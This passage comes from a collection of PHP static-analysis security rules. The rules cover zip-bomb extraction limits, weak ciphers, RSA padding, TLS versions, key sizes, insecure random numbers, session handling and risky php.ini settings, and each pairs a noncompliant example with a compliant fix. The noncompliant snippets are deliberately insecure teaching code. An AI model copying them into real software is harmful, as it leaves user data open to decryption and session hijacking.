  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold, in particular it’s not recommended to recursively expand archives (an entry of an archive could be also an archive).

Sensitive Code Example

For ZipArchive module:

$zip = new ZipArchive();
if ($zip->open($file) === true) {
    $zip->extractTo('.'); // Sensitive
    $zip->close();
}

For Zip module:

$zip = zip_open($file);
while ($file = zip_read($zip)) {
    $filename = zip_entry_name($file);
    $size = zip_entry_filesize($file);

    if (substr($filename, -1) !== '/') {
        $content = zip_entry_read($file, zip_entry_filesize($file)); // Sensitive - zip_entry_read() uses zip_entry_filesize()
        file_put_contents($filename, $content);
    } else {
        mkdir($filename);
    }
}
zip_close($zip);

Compliant Solution

For ZipArchive module:

define('MAX_FILES', 10000);
define('MAX_SIZE', 1000000000); // 1 GB
define('MAX_RATIO', 10);
define('READ_LENGTH', 1024);

$fileCount = 0;
$totalSize = 0;

$zip = new ZipArchive();
if ($zip->open($file) === true) {
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $filename = $zip->getNameIndex($i);
        $stats = $zip->statIndex($i);

        if (strpos($filename, '../') !== false || substr($filename, 0, 1) === '/') {
            throw new Exception();
        }

        if (substr($filename, -1) !== '/') {
            $fileCount++;
            if ($fileCount > MAX_FILES) {
                // Reached max. number of files
                throw new Exception();
            }

            $fp = $zip->getStream($filename); // Compliant
            $currentSize = 0;
            while (!feof($fp)) {
                $currentSize += READ_LENGTH;
                $totalSize += READ_LENGTH;

                if ($totalSize > MAX_SIZE) {
                    // Reached max. size
                    throw new Exception();
                }

                // Additional protection: check compression ratio
                if ($stats['comp_size'] > 0) {
                    $ratio = $currentSize / $stats['comp_size'];
                    if ($ratio > MAX_RATIO) {
                        // Reached max. compression ratio
                        throw new Exception();
                    }
                }

                file_put_contents($filename, fread($fp, READ_LENGTH), FILE_APPEND);
            }

            fclose($fp);
        } else {
            mkdir($filename);
        }
    }
    $zip->close();
}

For Zip module:

define('MAX_FILES', 10000);
define('MAX_SIZE', 1000000000); // 1 GB
define('MAX_RATIO', 10);
define('READ_LENGTH', 1024);

$fileCount = 0;
$totalSize = 0;

$zip = zip_open($file);
while ($file = zip_read($zip)) {
    $filename = zip_entry_name($file);

    if (strpos($filename, '../') !== false || substr($filename, 0, 1) === '/') {
        throw new Exception();
    }

    if (substr($filename, -1) !== '/') {
        $fileCount++;
        if ($fileCount > MAX_FILES) {
            // Reached max. number of files
            throw new Exception();
        }

        $currentSize = 0;
        while ($data = zip_entry_read($file, READ_LENGTH)) { // Compliant
            $currentSize += READ_LENGTH;
            $totalSize += READ_LENGTH;

            if ($totalSize > MAX_SIZE) {
                // Reached max. size
                throw new Exception();
            }

            // Additional protection: check compression ratio
            if (zip_entry_compressedsize($file) > 0) {
                $ratio = $currentSize / zip_entry_compressedsize($file);
                if ($ratio > MAX_RATIO) {
                    // Reached max. compression ratio
                    throw new Exception();
                }
            }

            file_put_contents($filename, $data, FILE_APPEND);
        }
    } else {
        mkdir($filename);
    }
}
zip_close($zip);

See

php:S2278

This rule is deprecated; use S5547 instead.

Why is this an issue?

According to the US National Institute of Standards and Technology (NIST), the Data Encryption Standard (DES) is no longer considered secure:

Adopted in 1977 for federal agencies to use in protecting sensitive, unclassified information, the DES is being withdrawn because it no longer provides the security that is needed to protect federal government information.

Federal agencies are encouraged to use the Advanced Encryption Standard, a faster and stronger algorithm approved as FIPS 197 in 2001.

For similar reasons, RC2 should also be avoided.

Noncompliant code example

<?php
  $ciphertext = mcrypt_encrypt(MCRYPT_DES, $key, $plaintext, $mode); // Noncompliant
  // ...
  $ciphertext = mcrypt_encrypt(MCRYPT_DES_COMPAT, $key, $plaintext, $mode); // Noncompliant
  // ...
  $ciphertext = mcrypt_encrypt(MCRYPT_TRIPLEDES, $key, $plaintext, $mode); // Noncompliant
  // ...
  $ciphertext = mcrypt_encrypt(MCRYPT_3DES, $key, $plaintext, $mode); // Noncompliant

  $cipher = "des-ede3-cfb";  // Noncompliant
  $ciphertext_raw = openssl_encrypt($plaintext, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv);
?>

Compliant solution

<?php
  $ciphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $plaintext, MCRYPT_MODE_CBC, $iv);
?>

Resources

php:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Mcrypt

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

mcrypt_encrypt(MCRYPT_DES, $key, $plaintext, $mode); // Noncompliant

Compliant solution

Mcrypt is deprecated and should not be used. You can use Sodium instead.

sodium_crypto_aead_aes256gcm_encrypt($plaintext, '', $nonce, $key);

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

php:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB

(Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Mcrypt

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

mcrypt_encrypt(MCRYPT_DES, $key, $plaintext, "ecb"); // Noncompliant

Compliant solution

Mcrypt is deprecated and should not be used. You can use Sodium instead.

For the AES symmetric cipher, use the GCM mode:

sodium_crypto_aead_aes256gcm_encrypt($plaintext, '', $nonce, $key);

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Cipher Block Chaining with Message Authentication Code
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it

is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

php:S2277

This rule is deprecated; use S5542 instead.

Why is this an issue?

Without OAEP in RSA encryption, it takes less work for an attacker to decrypt the data or infer patterns from the ciphertext. This rule logs an issue when openssl_public_encrypt is used with one the following padding constants: OPENSSL_NO_PADDING or OPENSSL_PKCS1_PADDING or OPENSSL_SSLV23_PADDING.

Noncompliant code example

function encrypt($data, $key) {
  $crypted='';
  openssl_public_encrypt($data, $crypted, $key, OPENSSL_NO_PADDING); // Noncompliant
  return $crypted;
}

Compliant solution

function encrypt($data, $key) {
  $crypted='';
  openssl_public_encrypt($data, $crypted, $key, OPENSSL_PKCS1_OAEP_PADDING);
  return $crypted;
}

Resources

php:S5876

Why is this an issue?

Session fixation attacks occur when an attacker can force a legitimate user to use a session ID that he knows. To avoid fixation attacks, it’s a good practice to generate a new session each time a user authenticates and delete/invalidate the existing session (the one possibly known by the attacker).

Noncompliant code example

In a Symfony Security's context, session fixation protection can be disabled with the value none for the session_fixation_strategy attribute:

namespace Symfony\Component\DependencyInjection\Loader\Configurator;

return static function (ContainerConfigurator $container) {
    $container->extension('security', [
        'session_fixation_strategy' => 'none', // Noncompliant
    ]);
};

Compliant solution

In a Symfony Security's context, session fixation protection is enabled by default. It can be explicitly enabled with the values migrate and invalidate for the session_fixation_strategy attribute:

namespace Symfony\Component\DependencyInjection\Loader\Configurator;

return static function (ContainerConfigurator $container) {
    $container->extension('security', [
        'session_fixation_strategy' => 'migrate', // Compliant
    ]);
};

Resources

php:S3336

Why is this an issue?

PHP’s session.use_trans_sid automatically appends the user’s session id to urls when cookies are disabled. On the face of it, this seems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked by anyone who might:

  • see the URL over the user’s shoulder
  • be sent the URL by the user
  • retrieve the URL from browser history
  • …​

For that reason, it’s better to practice a little "tough love" with your users and force them to turn on cookies.

Since session.use_trans_sid is off by default, this rule raises an issue when it is explicitly enabled.

Noncompliant code example

; php.ini
session.use_trans_sid=1  ; Noncompliant

Resources

php:S4787

This rule is deprecated; use S4426, S5542, S5547 instead.

Encrypting data is security-sensitive. It has led in the past to the following vulnerabilities:

Proper encryption requires both the encryption algorithm and the key to be strong. Obviously the private key needs to remain secret and be renewed regularly. However these are not the only means to defeat or weaken an encryption.

This rule flags function calls that initiate encryption/decryption.

Ask Yourself Whether

  • the private key might not be random, strong enough or the same key is reused for a long long time.
  • the private key might be compromised. It can happen when it is stored in an unsafe place or when it was transferred in an unsafe manner.
  • the key exchange is made without properly authenticating the receiver.
  • the encryption algorithm is not strong enough for the level of protection required. Note that encryption algorithms strength decreases as time passes.
  • the chosen encryption library is deemed unsafe.
  • a nonce is used, and the same value is reused multiple times, or the nonce is not random.
  • the RSA algorithm is used, and it does not incorporate an Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
  • the CBC (Cypher Block Chaining) algorithm is used for encryption, and it’s IV (Initialization Vector) is not generated using a secure random algorithm, or it is reused.
  • the Advanced Encryption Standard (AES) encryption algorithm is used with an unsecure mode. See the recommended practices for more information.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Generate encryption keys using secure random algorithms.
  • When generating cryptographic keys (or key pairs), it is important to use a key length that provides enough entropy against brute-force attacks. For the Blowfish algorithm the key should be at least 128 bits long, while for the RSA algorithm it should be at least 2048 bits long.
  • Regenerate the keys regularly.
  • Always store the keys in a safe location and transfer them only over safe channels.
  • If there is an exchange of cryptographic keys, check first the identity of the receiver.
  • Only use strong encryption algorithms. Check regularly that the algorithm is still deemed secure. It is also imperative that they are implemented correctly. Use only encryption libraries which are deemed secure. Do not define your own encryption algorithms as they will most probably have flaws.
  • When a nonce is used, generate it randomly every time.
  • When using the RSA algorithm, incorporate an Optimal Asymmetric Encryption Padding (OAEP).
  • When CBC is used for encryption, the IV must be random and unpredictable. Otherwise it exposes the encrypted value to crypto-analysis attacks like "Chosen-Plaintext Attacks". Thus a secure random algorithm should be used. An IV value should be associated to one and only one encryption cycle, because the IV’s purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts.
  • The Advanced Encryption Standard (AES) encryption algorithm can be used with various modes. Galois/Counter Mode (GCM) with no padding should be preferred to the following combinations which are not secured:
    • Electronic Codebook (ECB) mode: Under a given key, any given plaintext block always gets encrypted to the same ciphertext block. Thus, it does not hide data patterns well. In some senses, it doesn’t provide serious message confidentiality, and it is not recommended for use in cryptographic protocols at all.
    • Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks.

Sensitive Code Example

Builtin functions

function myEncrypt($cipher, $key, $data, $mode, $iv, $options, $padding, $infile, $outfile, $recipcerts, $headers, $nonce, $ad, $pub_key_ids, $env_keys)
{
    mcrypt_ecb ($cipher, $key, $data, $mode); // Sensitive
    mcrypt_cfb($cipher, $key, $data, $mode, $iv); // Sensitive
    mcrypt_cbc($cipher, $key, $data, $mode, $iv); // Sensitive
    mcrypt_encrypt($cipher, $key, $data, $mode); // Sensitive

    openssl_encrypt($data, $cipher, $key, $options, $iv); // Sensitive
    openssl_public_encrypt($data, $crypted, $key, $padding); // Sensitive
    openssl_pkcs7_encrypt($infile, $outfile, $recipcerts, $headers); // Sensitive
    openssl_seal($data, $sealed_data, $env_keys, $pub_key_ids); // Sensitive

    sodium_crypto_aead_aes256gcm_encrypt ($data, $ad, $nonce, $key); // Sensitive
    sodium_crypto_aead_chacha20poly1305_encrypt ($data, $ad, $nonce, $key); // Sensitive
    sodium_crypto_aead_chacha20poly1305_ietf_encrypt ($data, $ad, $nonce, $key); // Sensitive
    sodium_crypto_aead_xchacha20poly1305_ietf_encrypt ($data, $ad, $nonce, $key); // Sensitive
    sodium_crypto_box_seal ($data, $key); // Sensitive
    sodium_crypto_box ($data, $nonce, $key); // Sensitive
    sodium_crypto_secretbox ($data, $nonce, $key); // Sensitive
    sodium_crypto_stream_xor ($data, $nonce, $key); // Sensitive
}

CakePHP

use Cake\Utility\Security;

function myCakeEncrypt($key, $data, $engine)
{
    Security::encrypt($data, $key); // Sensitive

    // Do not use custom made engines and remember that Mcrypt is deprecated.
    Security::engine($engine); // Sensitive. Setting the encryption engine.
}

CodeIgniter

class EncryptionController extends CI_Controller
{
    public function __construct()
    {
        parent::__construct();
        $this->load->library('encryption');
    }

    public function index()
    {
        $this->encryption->create_key(16); // Sensitive. Review the key length.
        $this->encryption->initialize( // Sensitive.
            array(
                'cipher' => 'aes-256',
                'mode' => 'ctr',
                'key' => 'the key',
            )
        );
        $this->encryption->encrypt("mysecretdata"); // Sensitive.
    }
}

CraftCMS version 3

use Craft;

// This is similar to Yii as it used by CraftCMS
function craftEncrypt($data, $key, $password) {
    Craft::$app->security->encryptByKey($data, $key); // Sensitive
    Craft::$app->getSecurity()->encryptByKey($data, $key); // Sensitive
    Craft::$app->security->encryptByPassword($data, $password); // Sensitive
    Craft::$app->getSecurity()->encryptByPassword($data, $password); // Sensitive
}

Drupal 7 - Encrypt module

function drupalEncrypt() {
    $encrypted_text = encrypt('some string to encrypt'); // Sensitive
}

Joomla

use Joomla\Crypt\CipherInterface;

abstract class MyCipher implements CipherInterface // Sensitive. Implementing custom cipher class
{}

function joomlaEncrypt() {
    new Joomla\Crypt\Cipher_Sodium(); // Sensitive
    new Joomla\Crypt\Cipher_Simple(); // Sensitive
    new Joomla\Crypt\Cipher_Rijndael256(); // Sensitive
    new Joomla\Crypt\Cipher_Crypto(); // Sensitive
    new Joomla\Crypt\Cipher_Blowfish(); // Sensitive
    new Joomla\Crypt\Cipher_3DES(); // Sensitive
}
}

Laravel

use Illuminate\Support\Facades\Crypt;

function myLaravelEncrypt($data)
{
    Crypt::encryptString($data); // Sensitive
    Crypt::encrypt($data); // Sensitive
    // encrypt using the Laravel "encrypt" helper
    encrypt($data); // Sensitive
}

PHP-Encryption library

use Defuse\Crypto\Crypto;
use Defuse\Crypto\File;

function mypPhpEncryption($data, $key, $password, $inputFilename, $outputFilename, $inputHandle, $outputHandle) {
    Crypto::encrypt($data, $key); // Sensitive
    Crypto::encryptWithPassword($data, $password); // Sensitive
    File::encryptFile($inputFilename, $outputFilename, $key); // Sensitive
    File::encryptFileWithPassword($inputFilename, $outputFilename, $password); // Sensitive
    File::encryptResource($inputHandle, $outputHandle, $key); // Sensitive
    File::encryptResourceWithPassword($inputHandle, $outputHandle, $password); // Sensitive
}

PhpSecLib

function myphpseclib($mode) {
    new phpseclib\Crypt\RSA(); // Sensitive. Note: RSA can also be used for signing data.
    new phpseclib\Crypt\AES(); // Sensitive
    new phpseclib\Crypt\Rijndael(); // Sensitive
    new phpseclib\Crypt\Twofish(); // Sensitive
    new phpseclib\Crypt\Blowfish(); // Sensitive
    new phpseclib\Crypt\RC4(); // Sensitive
    new phpseclib\Crypt\RC2(); // Sensitive
    new phpseclib\Crypt\TripleDES(); // Sensitive
    new phpseclib\Crypt\DES(); // Sensitive

    new phpseclib\Crypt\AES($mode); // Sensitive
    new phpseclib\Crypt\Rijndael($mode); // Sensitive
    new phpseclib\Crypt\TripleDES($mode); // Sensitive
    new phpseclib\Crypt\DES($mode); // Sensitive
}

Sodium Compat library

function mySodiumCompatEncrypt($data, $ad, $nonce, $key) {
    ParagonIE_Sodium_Compat::crypto_aead_chacha20poly1305_ietf_encrypt($data, $ad, $nonce, $key); // Sensitive
    ParagonIE_Sodium_Compat::crypto_aead_xchacha20poly1305_ietf_encrypt($data, $ad, $nonce, $key); // Sensitive
    ParagonIE_Sodium_Compat::crypto_aead_chacha20poly1305_encrypt($data, $ad, $nonce, $key); // Sensitive

    ParagonIE_Sodium_Compat::crypto_aead_aes256gcm_encrypt($data, $ad, $nonce, $key); // Sensitive

    ParagonIE_Sodium_Compat::crypto_box($data, $nonce, $key); // Sensitive
    ParagonIE_Sodium_Compat::crypto_secretbox($data, $nonce, $key); // Sensitive
    ParagonIE_Sodium_Compat::crypto_box_seal($data, $key); // Sensitive
    ParagonIE_Sodium_Compat::crypto_secretbox_xchacha20poly1305($data, $nonce, $key); // Sensitive
}

Yii version 2

use Yii;

// Similar to CraftCMS as it uses Yii
function YiiEncrypt($data, $key, $password) {
    Yii::$app->security->encryptByKey($data, $key); // Sensitive
    Yii::$app->getSecurity()->encryptByKey($data, $key); // Sensitive
    Yii::$app->security->encryptByPassword($data, $password); // Sensitive
    Yii::$app->getSecurity()->encryptByPassword($data, $password); // Sensitive
}

Zend

use Zend\Crypt\FileCipher;
use Zend\Crypt\PublicKey\DiffieHellman;
use Zend\Crypt\PublicKey\Rsa;
use Zend\Crypt\Hybrid;
use Zend\Crypt\BlockCipher;

function myZendEncrypt($key, $data, $prime, $options, $generator, $lib)
{
    new FileCipher; // Sensitive. This is used to encrypt files

    new DiffieHellman($prime, $generator, $key); // Sensitive

    $rsa = Rsa::factory([ // Sensitive
        'public_key'    => 'public_key.pub',
        'private_key'   => 'private_key.pem',
        'pass_phrase'   => 'mypassphrase',
        'binary_output' => false,
    ]);
    $rsa->encrypt($data); // No issue raised here. The configuration of the Rsa object is the line to review.

    $hybrid = new Hybrid(); // Sensitive

    BlockCipher::factory($lib, $options); // Sensitive
}

See

php:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Core PHP

Code examples

Noncompliant code example

$opts = array(
  'ssl' => [
    'crypto_method' => STREAM_CRYPTO_METHOD_TLSv1_1_CLIENT // Noncompliant
  ],
  'http'=>array(
    'method'=>"GET"
  )
);

$context = stream_context_create($opts);

$fp = fopen('https://www.example.com', 'r', false, $context);
fpassthru($fp);
fclose($fp);

Compliant solution

$opts = array(
  'ssl' => [
    'crypto_method' => STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT
  ],
  'http'=>array(
    'method'=>"GET"
  )
);

$context = stream_context_create($opts);

$fp = fopen('https://www.example.com', 'r', false, $context);
fpassthru($fp);
fclose($fp);

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

php:S3337

Why is this an issue?

enable_dl is on by default and allows open_basedir restrictions, which limit the files a script can access, to be ignored. For that reason, it’s a dangerous option and should be explicitly turned off.

This rule raises an issue when enable_dl is not explicitly set to 0 in php.ini.

Noncompliant code example

; php.ini
enable_dl=1  ; Noncompliant

Compliant solution

; php.ini
enable_dl=0

Resources

php:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Core PHP

Code examples

Noncompliant code example

Here is an example of a private key generation with RSA:

$config = [
    "digest_alg"       => "sha512",
    "private_key_bits" => 1024,                 // Noncompliant
    "private_key_type" => OPENSSL_KEYTYPE_RSA,
];

$res = openssl_pkey_new($config);

Compliant solution

$config = [
    "digest_alg"       => "sha512",
    "private_key_bits" => 2048,
    "private_key_type" => OPENSSL_KEYTYPE_RSA,
];

$res = openssl_pkey_new($config);

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms are mentioned directly in their names. For example, secp256k1 generates a 256-bits long private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterpart.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

php:S3334

Why is this an issue?

allow_url_fopen and allow_url_include allow code to be read into a script from URL’s. The ability to suck in executable code from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. Even if your input filtering is perfect today, are you prepared to bet your site that it will always be perfect in the future?

This rule raises an issue when either property is explicitly enabled in php.ini and when allow_url_fopen, which defaults to enabled, is not explicitly disabled.

Noncompliant code example

; php.ini  Noncompliant; allow_url_fopen not explicitly disabled
allow_url_include=1  ; Noncompliant

Compliant solution

; php.ini
allow_url_fopen=0
allow_url_include=0

Resources

php:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the rand() and mt_rand() functions rely on a pseudorandom number generator, it should not be used for security-critical applications or for protecting sensitive data.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use functions which rely on a cryptographically strong random number generator such as random_int() or random_bytes() or openssl_random_pseudo_bytes()
  • When using openssl_random_pseudo_bytes(), provide and check the crypto_strong parameter
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

$random = rand();
$random2 = mt_rand(0, 99);

Compliant Solution

$randomInt = random_int(0,99); // Compliant; generates a cryptographically secure random integer

See

php:S3335

Why is this an issue?

The cgi.force_redirect php.ini configuration is on by default, and it prevents unauthenticated access to scripts when PHP is running as a CGI. Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.

This rule raises an issue when when cgi.force_redirect is explicitly disabled.

Noncompliant code example

; php.ini
cgi.force_redirect=0  ; Noncompliant

Resources

php:S3332

This rule is deprecated, and will eventually be removed.

Why is this an issue?

Cookies without fixed lifetimes or expiration dates are known as non-persistent, or "session" cookies, meaning they last only as long as the browser session, and poof away when the browser closes. Cookies with expiration dates, "persistent" cookies, are stored/persisted until those dates.

Non-persistent cookies should be used for the management of logged-in sessions on web sites. To make a cookie non-persistent, simply omit the expires attribute.

This rule raises an issue when expires is set for a session cookie, either programmatically or via configuration, such as session.cookie_lifetime.

Resources

php:S3333

Why is this an issue?

The open_basedir configuration in php.ini limits the files the script can access using, for example, include and fopen(). Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access files outside the allowed path.

open_basedir should be configured with a directory, which will then be accessible recursively. However, the use of . (current directory) as an open_basedir value should be avoided since it’s resolved dynamically during script execution, so a chdir('/') command could lay the whole server open to the script.

This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence step. This rule raises an issue when open_basedir is not present in php.ini, and when open_basedir contains root, or the current directory (.) symbol.

Noncompliant code example

; php.ini try 1
